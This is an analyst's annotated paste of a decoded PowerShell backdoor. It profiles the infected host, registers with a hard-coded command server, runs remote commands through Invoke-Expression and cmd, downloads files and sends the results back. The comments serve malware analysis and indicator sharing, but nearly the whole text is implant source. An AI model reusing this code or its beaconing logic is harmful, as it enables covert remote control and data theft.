dissectmalware

Malicious PowerShell after 36 rounds of decoding

Mar 3rd, 2019
  <#
    Analyst annotation of the decoded paste (content kept byte-for-byte as pasted; only comments added).
    Identifier names are ROT13 of plain English: Zbq = Mod, raPelcg = enCrypt, qrPelcg = deCrypt,
    uggcCBFG = httpPOST, uggcTRG = httpGET, fuggcTRG = shttpGET, Riny = Eval, vasbvavg = infoinit,
    zq5trarengbe = md5generator, pbzznaq_naq_pbageby = command_and_control,
    trgEnaqbzCebkl = getRandomProxy, ertChfu = regPush, ertvfgre = register,
    $cevingr = private, $choyvp = public. Decoding them makes the control flow readable.
    Line breaks were lost when the paste was made, so this text does not run as-is.
    Behaviour visible below: profile the host and user, register with the server listed in $C,
    then poll it for commands and return the results.
    Network indicators (all taken from this paste): http://162.223.89.53 with paths /oa/,
    /oc/api/?t=<id> and /or/?t=<id>, JSON bodies of the form {"data":"..."}, and a public-IP
    lookup to http://ipv4bot.whatismyipaddress.com/. Downloaded files are written under
    c:\programdata\. The strings "R-I", "R-O", "W-I", "W-O" are printed to the console.
  #>
  1. $global:url = ""$global:id = ""$cevingr = 959, 713$choyvp = 37, 437$C = @('http://162.223.89.53')<# Zbq(x, H, n): square-and-multiply modular exponentiation, returns x^H mod n. #>function Zbq($x, $H, $n){    $Xi = $x    $Ei = $H    $Yi = 1    while($Ei -gt 0){        if(($Ei % 2) -eq 0) {            $Xi = ($Xi * $Xi) % $n            $Ei = $Ei / 2        } else {            $Yi = ($Xi * $Yi) % $n            $Ei = $Ei - 1        }    }    return $Yi}<# raPelcg(key, text): maps each character code through Zbq with ($cevingr) = (959, 713) and returns the list of numbers. There is no randomness, so every character always maps to the same number: effectively a per-character substitution, which lets captured registration traffic be decoded for analysis. On error it only re-picks the server. #>function raPelcg($pk, $cynvagrkg){    try{        $xrl, $n = $pk;        $zlneenl = @();        for($i=0; $i -lt $cynvagrkg.Length; $i++){            $ahz = [int][char]$cynvagrkg[$i]            $t = Zbq $ahz $xrl $n            $zlneenl += $t        }        return $zlneenl    }    catch{        trgEnaqbzCebkl    }}<# qrPelcg(key, numbers): inverse of raPelcg. Neither this function nor $choyvp is used anywhere in this paste. #>function qrPelcg($pk, $pvcuregrkg){    try{         $xrl, $n = $pk;         $zl_neenl = @();         for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){            $ahz = [int]$pvcuregrkg[$i]            $t =  Zbq $ahz $xrl $n            $zl_neenl += [convert]::ToChar([int]$t)         }         return -join $zl_neenl       }    catch{trgEnaqbzCebkl       }}<# uggcCBFG(path, body): HTTP POST of body as application/json to $global:url + path, through the system proxy with default credentials. On failure it prints the path and error to the host, re-picks the server, sleeps 20-40 s and returns "error". #>function uggcCBFG($hey,$rap_zft){    trgEnaqbzCebkl try{$pbagrag = $rap_zft$jroerd = [System.Net.WebRequest]::Create($global:url + $hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag);$jroerd.Method = "POST";$jroerd.ContentLength = $rapbqr_qngn.length;        $jroerd.ContentType = "application/json"if ($rapbqr_qngn.Length -gt 0){$erd_fgernz = $jroerd.GetRequestStream();$erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length);}[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}} catch {$erfhyg = "error"        write-host $hey "`t" ($global:url + $_.Exception.Message)        trgEnaqbzCebkl        start-sleep (Get-Random -Minimum 20 
-Maximum 40)}return $erfhyg}<# uggcTRG(path): HTTP GET from $global:url + path with the same proxy settings and error handling as uggcCBFG. #>function uggcTRG($hey){    trgEnaqbzCebkltry{$jroerd = [System.Net.WebRequest]::Create($global:url + $hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$jroerd.Method = "GET";[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}} catch {$erfhyg = "error"        write-host $hey "`t" ($global:url + $_.Exception.Message)        trgEnaqbzCebkl        start-sleep (Get-Random -Minimum 20 -Maximum 40)}return $erfhyg  }<# fuggcTRG(url): HTTP GET of an absolute URL; any error yields "". Only used for the public-IP lookup in trgCVC. #>function fuggcTRG($hey){try{$jroerd = [System.Net.WebRequest]::Create($hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$jroerd.Method = "GET";[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}}catch {    $erfhyg = ""}return $erfhyg  }<# Riny(cmd): runs the string through Invoke-Expression and returns its output as a string; a command starting with "cd" returns $PWD instead; exceptions return the message. This is the generic code-execution path of the implant. #>function Riny($pzq){    try{        $bhg = IEX $pzq -ErrorAction SilentlyContinue        if($pzq.StartsWith("cd")){$bhg = $PWD;}        $bhg = ($bhg | Out-String)    } catch {        $bhg = $_.Exception.Message    }    return $bhg}<# vasbvavg: builds the host profile from nested helpers: OS name, IPv4 addresses of IP-enabled adapters (excluding 169.* APIPA), architecture, hostname, domain, '+' when running as Administrator, username, and public IP. Fields are joined with "**"; the MD5 of the whole string becomes $global:id. In trgHfreanzr the check is defeated by the $ghfr/$ghfre typo (and .replace is a literal replace, not a regex), so the 8.3 ShortName branch is always attempted. #>function vasbvavg(){    function trgVC(){    try{    $vcf = ""    Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | Where{$_.IPAddress[0] -NotLike '169*'} | % {$vcf = $vcf + "-" + $_.IPAddress[0]}    return $vcf.substring(1);    } catch {    return "ErrorIP";    }    }    function trgBF(){    try{    return (Get-WmiObject Win32_OperatingSystem).Name;    } catch {    return "ErrorOS";    }    }    function trgNepu(){    try{    return  (Get-WmiObject Win32_OperatingSystem).OSArchitecture;    } catch {    return "ErrorArch";    }    }    function 
trgQbznva(){    try{    return (Get-WmiObject Win32_ComputerSystem).Domain;    } catch {    return "ErrorDomain";    }    }    function trgUbfgAnzr(){    try{    return (Get-WmiObject Win32_ComputerSystem).Name;    } catch {    return "ErrorHostName";    }    }    function trgHfreanzr(){        try{            try{                $sfb = New-Object -ComObject Scripting.FileSystemObject;                $hfre = $env:UserName                $ghfre = $hfre.replace('[^a-zA-Z0-9]','')                if($ghfr -eq $hfre){                    return $hfre                }                return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName)            } catch {                return $env:UserName            }         } catch {            return "-"        }    }    function vfNqzva(){        try{            $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent()            $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl)            $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator            if ($Cevapvcny.IsInRole($NqzvaEbyr))            {                return '+'            }            else            {                return ''            }        } catch {            return ""          }    }    function trgCVC(){        try{            $ernyVC = fuggcTRG "http://ipv4bot.whatismyipaddress.com/"            return $ernyVC        } catch {            return "ErrorPublicIP"          }    }    $FlfVasb = trgBF    $FlfVasb += "**"    $FlfVasb += trgVC    $FlfVasb += "**"    $FlfVasb += trgNepu    $FlfVasb += "**"    $FlfVasb += trgUbfgAnzr    $FlfVasb += "**"    $FlfVasb += trgQbznva    $FlfVasb += "**"    $FlfVasb += vfNqzva    $FlfVasb += trgHfreanzr    $FlfVasb += "**"    $FlfVasb += trgCVC    $global:id = zq5trarengbe($FlfVasb)    return ($global:id + '**' + $FlfVasb)}<# zq5trarengbe(s): uppercase hex MD5 of the UTF-8 bytes of s, dashes removed; used as the bot id. #>function zq5trarengbe($fgeVa){    $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider  
  $hgs8 = new-object -TypeName System.Text.UTF8Encoding    $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa)))    $bhgchg = $unfu.replace('-','')    return $bhgchg}<# pbzznaq_naq_pbageby(cmd): dispatcher for server commands. "upload <url>" downloads the URL with WebClient (system proxy, default credentials) into c:\programdata\ using the remote file name and then returns the working directory; "cmd <text>" runs it via cmd /c; "b64 <base64>" ASCII-decodes it and passes it to Riny; anything else goes to Riny (Invoke-Expression) directly. Every branch returns the exception message on failure. #>function pbzznaq_naq_pbageby($pzq){    try{            if($pzq.StartsWith('upload')){        try{                $pzq=$pzq.replace('upload ','')            $wc = New-Object System.Net.WebClient                $wc.proxy = [Net.WebRequest]::GetSystemWebProxy()                $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials          $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf('/'),$pzq.Length-$pzq.LastIndexOf('/'))))        return Riny "pwd"         }catch{         return $_.Exception.Message        }         }        elseif($pzq.StartsWith('cmd')){            $pzq=$pzq.replace('cmd ','')            try{                $bhg = cmd /c $pzq                $bhg = $bhg | Out-String                return $bhg            } catch {                return $_.Exception.Message            }        }        elseif($pzq.StartsWith('b64')){            $pzq=$pzq.replace('b64 ','')            try{                $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq))                $bhg = Riny $pzq                $bhg = $bhg | Out-String                return $bhg            } catch {                return $_.Exception.Message            }        }        else {            return Riny $pzq        }    }    catch{        return $_.Exception.Message    }}<# trgEnaqbzCebkl: picks a random entry of $C as $global:url; with a single entry it always selects the same host. #>function trgEnaqbzCebkl(){$eaq = Get-Random -minimum 0 -maximum ($C.Length)$global:url = $C[$eaq]}<# ertChfu(path, name, value): writes a registry value with New-ItemProperty -Force. Defined but never called in this paste. #>function ertChfu([string]$p, [string]$k, [string]$v){    try{        New-ItemProperty -Path $p -Name $k -Value $v -Force -ErrorAction SilentlyContinue | Out-Null    }    catch {                return "error"    }}<# ertvfgre: registration loop. Runs vasbvavg, passes the profile through raPelcg with $cevingr, POSTs it as {"data":"<numbers>"} to /oa/, and retries every 30 s until the server answers "done". #>function ertvfgre(){    while($true) {Write-Host "R-I"        $vasb = vasbvavg        $vasb = raPelcg $cevingr $vasb        $vasb = ('{"data":"' + $vasb + 
'"}')                $vasb = uggcCBFG ("/oa/") $vasb        if($vasb -eq '"done"'){            break        } else {            start-sleep 30        }        Write-Host "R-O"    }}<# Main: register once, then loop every 300 s: GET /oc/api/?t=<id>, strip the first and last character, split on "~~!!~~" into a command id and the command text, run it through pbzznaq_naq_pbageby, Base64-encode the result ("NULL" when empty), and POST {"data":"<id>:<base64>"} to /or/?t=<id>. Any exception re-picks the server and continues. #>ertvfgrewhile($true){    write-host "W-I"    try{$pzq = uggcTRG ("/oc/api/?t=" + $global:id)if ($pzq.Length -gt 0){            $pzq = $pzq.substring(1,$pzq.Length-2)$pzq = $pzq -split "~~!!~~"            $pvq = $pzq[0]            $pzq = $pzq[1]                        $erfhyg = pbzznaq_naq_pbageby $pzq            if($erfhyg.Length -le 1){                $erfhyg = "NULL"            }            $erfhyg = [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($erfhyg))            $erfhyg = ($pvq + ':' + $erfhyg)            $nqqe = ('/or/?t=' + $global:id)            $qngn = ('{"data":"' + $erfhyg + '"}')    $erfhyg = uggcCBFG $nqqe $qngn        }    }    catch{        trgEnaqbzCebkl        continue    }    write-host "W-O"    start-sleep 300}